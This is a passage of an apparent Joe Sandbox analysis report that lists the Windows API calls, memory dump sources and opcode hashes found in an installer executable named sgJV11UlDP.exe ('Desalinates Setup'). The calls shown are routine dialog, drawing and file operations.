                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: 7e2d6c76972bccc6bfe42acd4d5d1ed274f309eaf3cef67224d7e78ff27b17ad
                                                                      • Instruction ID: 242f43cfa1d4ef5d1935b54718e26804d33959e399511836c9edd6ef5d071c48
                                                                      • Opcode Fuzzy Hash: 7e2d6c76972bccc6bfe42acd4d5d1ed274f309eaf3cef67224d7e78ff27b17ad
                                                                      • Instruction Fuzzy Hash: 5AF0A0725441009BD701EBB49A49AEEB768AF26324F6041BBE141F21C1D6B889459B6A
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404A97
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404AA4
                                                                      • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404AF3
                                                                      • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404B0A
                                                                      • SetWindowLongA.USER32(?,000000FC,00405088), ref: 00404B24
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B36
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B4A
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404B60
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6C
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B7C
                                                                      • DeleteObject.GDI32(00000110), ref: 00404B81
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAC
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BB8
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C52
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C82
                                                                        • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C96
                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404CC4
                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CD2
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404CE2
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DDD
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E42
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E57
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E7B
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E9B
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404EB0
                                                                      • GlobalFree.KERNEL32(?), ref: 00404EC0
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F39
                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404FE2
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FF1
                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 00405011
                                                                      • ShowWindow.USER32(?,00000000), ref: 0040505F
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040506A
                                                                      • ShowWindow.USER32(00000000), ref: 00405071
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 2564846305-813528018
                                                                      • Opcode ID: 21134a8715fb0f3faf1c9c54640a0aa9d3ab0ad6357815c91f4f9f85ad6b74aa
                                                                      • Instruction ID: a268e52f59abad667f40846b9330857a26eef97fbfd8c04b7b0b2c1eeebe026e
                                                                      • Opcode Fuzzy Hash: 21134a8715fb0f3faf1c9c54640a0aa9d3ab0ad6357815c91f4f9f85ad6b74aa
                                                                      • Instruction Fuzzy Hash: 56026DB0900209EFEB109FA8DD45AAE7BB5FB84314F10813AF610B62E1D7789D52DF58
                                                                      APIs
                                                                      • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404271
                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404285
                                                                      • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004042A3
                                                                      • GetSysColor.USER32(?), ref: 004042B4
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042C3
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042D2
                                                                      • lstrlenA.KERNEL32(?), ref: 004042D5
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042E4
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042F9
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040435B
                                                                      • SendMessageA.USER32(00000000), ref: 0040435E
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404389
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043C9
                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004043D8
                                                                      • SetCursor.USER32(00000000), ref: 004043E1
                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004043F7
                                                                      • SetCursor.USER32(00000000), ref: 004043FA
                                                                      • SendMessageA.USER32(00000111,?,00000000), ref: 00404426
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040443A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                      • String ID: Call$N
                                                                      • API String ID: 3103080414-3438112850
                                                                      • Opcode ID: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                      • Instruction ID: a3db5b80d5f6c8d56f7a184239f37e003a0a90a84a660de175ffc46cbe068f47
                                                                      • Opcode Fuzzy Hash: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                      • Instruction Fuzzy Hash: D361B5B1A40204BFEF109F60DD45F6A7B69FB84704F10802AFB05BA1D1C7B8A951CF99
                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,Desalinates Setup,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: Desalinates Setup$F
                                                                      • API String ID: 941294808-3598714662
                                                                      • Opcode ID: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                      • Instruction ID: 1ef7ef1d3183d2fe833be2fdc16277d02f602c466de40d92ea6efb336f18bcfe
                                                                      • Opcode Fuzzy Hash: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                      • Instruction Fuzzy Hash: 53417C71400249AFCB058FA5DE459BF7BB9FF45314F00802EF9A1AA1A0C778DA55DFA4
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405DED,?,?), ref: 00405C8D
                                                                      • GetShortPathNameA.KERNEL32(?,007A12D8,00000400), ref: 00405C96
                                                                        • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
                                                                        • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D
                                                                      • GetShortPathNameA.KERNEL32(?,007A16D8,00000400), ref: 00405CB3
                                                                      • wsprintfA.USER32 ref: 00405CD1
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007A16D8,C0000000,00000004,007A16D8,?,?,?,?,?), ref: 00405D0C
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D1B
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D53
                                                                      • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED8,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405DA9
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405DBA
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DC1
                                                                        • Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\sgJV11UlDP.exe,80000000,00000003), ref: 00405B8A
                                                                        • Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BAC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                      • String ID: %s=%s$[Rename]
                                                                      • API String ID: 2171350718-1727408572
                                                                      • Opcode ID: 57b324a61c57413be18c754cd008fd5a6ce2658ac10cbe97ee3ee47279fdbbb4
                                                                      • Instruction ID: 4ef5f1c50d251b73862b961a89edc9b2cc60572935cd21a4370a6936b8511f12
                                                                      • Opcode Fuzzy Hash: 57b324a61c57413be18c754cd008fd5a6ce2658ac10cbe97ee3ee47279fdbbb4
                                                                      • Instruction Fuzzy Hash: 5231F231201B15ABD2206B659D4DF6B3A6CDF86754F14053FFA01F62D2EA3CE8058EAD
                                                                      APIs
                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402CF8
                                                                      • MulDiv.KERNEL32(00515332,00000064,00515336), ref: 00402D23
                                                                      • wsprintfA.USER32 ref: 00402D33
                                                                      • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: 2SQ$6SQ$verifying installer: %d%%
                                                                      • API String ID: 1451636040-2546640263
                                                                      • Opcode ID: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
                                                                      • Instruction ID: 93681796157c975abd13c8aaf7f83402805495348c169d35143c581ed88c076c
                                                                      • Opcode Fuzzy Hash: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
                                                                      • Instruction Fuzzy Hash: 3001FF71640209BBEF109F60DE4AFEE3769EB04345F00803AFA16B51D0DBB999568F59
                                                                      APIs
                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\sgJV11UlDP.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                      • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\sgJV11UlDP.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                      • CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                      Strings
                                                                      • *?|<>/":, xrefs: 0040629F
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406258
                                                                      • "C:\Users\user\Desktop\sgJV11UlDP.exe", xrefs: 00406293
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\sgJV11UlDP.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-478558231
                                                                      • Opcode ID: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                      • Instruction ID: c458f316ef597d28f2da60d7b579c442bef5f501f0b3efb69703b1c7b5c33328
                                                                      • Opcode Fuzzy Hash: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                      • Instruction Fuzzy Hash: 2211E25180479129FB3226280C44FB77F984B9B770F1901BFD4C6722C2C67C5CA6826D
                                                                      APIs
                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004040FF
                                                                      • GetSysColor.USER32(00000000), ref: 0040413D
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404149
                                                                      • SetBkMode.GDI32(?,?), ref: 00404155
                                                                      • GetSysColor.USER32(?), ref: 00404168
                                                                      • SetBkColor.GDI32(?,?), ref: 00404178
                                                                      • DeleteObject.GDI32(?), ref: 00404192
                                                                      • CreateBrushIndirect.GDI32(?), ref: 0040419C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                      • Instruction ID: 7e7a0635a9a9ad053635d0a61e184563e53fd5caf941e55c08cb8fd0a55be6c0
                                                                      • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                      • Instruction Fuzzy Hash: 312195715007049BD7309F68DD0CB5BBBF4AF91710B048A2EEA96A62E4C738D894CB54
                                                                      APIs
                                                                        • Part of subcall function 70021215: GlobalAlloc.KERNEL32(00000040,70021233,?,700212CF,-7002404B,700211AB,-000000A0), ref: 7002121D
                                                                      • GlobalFree.KERNEL32(?), ref: 700225DE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 70022618
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1895783302.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                      • Associated: 00000000.00000002.1895725058.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895885805.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895913966.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_70020000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 666da71ae62f53e939eeb41b5ec057c328ff0c18813e23c0ea7c9ee6df6abc0a
                                                                      • Instruction ID: ee581b5cd2ffcd3020efd9b74a9205194d665084d8d5e0e3347cddf6e36108da
                                                                      • Opcode Fuzzy Hash: 666da71ae62f53e939eeb41b5ec057c328ff0c18813e23c0ea7c9ee6df6abc0a
                                                                      • Instruction Fuzzy Hash: F641B172104610FFE3168FA4ECD8D2E77BAFB85B22B60852DF60186221D735A9059B71
                                                                      APIs
                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049E9
                                                                      • GetMessagePos.USER32 ref: 004049F1
                                                                      • ScreenToClient.USER32(?,?), ref: 00404A0B
                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A1D
                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A43
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
